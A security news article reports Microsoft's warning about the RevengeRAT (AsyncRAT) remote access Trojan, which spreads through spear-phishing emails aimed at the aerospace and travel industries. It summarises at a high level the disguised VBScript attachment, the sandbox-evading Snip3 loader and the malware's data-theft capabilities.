Microsoft Issues Warning for New RAT Targeting Industries

Microsoft Security Intelligence published a series of tweets, warning for the spread of a new strain of malware that targets the aerospace and travel industries. The malware in question has been named RevengeRAT.

A RAT or a remote access Trojan is a type of malware that allows bad actors to gain considerable control over an infected system or network. RATs usually include a backdoor component that allows hackers to send commands and execute code on the victim system while staying undetected for as long as possible.

The new RevengeRAT, also called AsyncRAT, is being spread primarily using spear-phishing emails. Spear-phishing is the method of sending malicious mail, masking the email to look as though it was sent from a trusted source, usually someone who the recipient already knows and trusts.

Unlike regular phishing where emails are sent in mass spam campaigns, spear-phishing tends to be a more narrowly targeted approach, focusing on a specific business, organization or entity.

The malicious emails spreading RevengeRAT have an attachment masquerading as an Adobe PDF file, while in reality it is a Visual Basic file, laden with malicious scripts. Once the script is executed, it deploys the RAT payload. The malicious file in the attached file usually abuses legitimate web services and contains a link to the Visual Basic script file.

Security company Morphisec, quoted in Microsoft's tweets, named the loader used in the deployment of RevengeRAT "Snip3". A curious fact about the loader is that it skips the deployment of the remote access Trojan component entirely if it discovers that it is being executed within a Windows Sandbox or another virtual machine environment that can be used as a malware-catching sandbox.

The RevengeRAT has the capability to exfiltrate login credentials, capture screenshots and access webcams and peek into clipboard contents.

Once the RAT has been deployed on the victim's system, it contacts its command and control server, using a dynamic hosting site, and then abused PowerShell and fileless methods to grab and deploy three further payloads from public-facing links on sites such as Pastebin.

The keywords and angle used in the spear-phishing emails used by the bad actors running the current RevengeRAT campaigns are all slanted towards workers in the travel and aerospace sectors, according to Microsoft.

The tweets further noted that Microsoft's Defender can detect the separate components of this malware and react at every stage of the attack.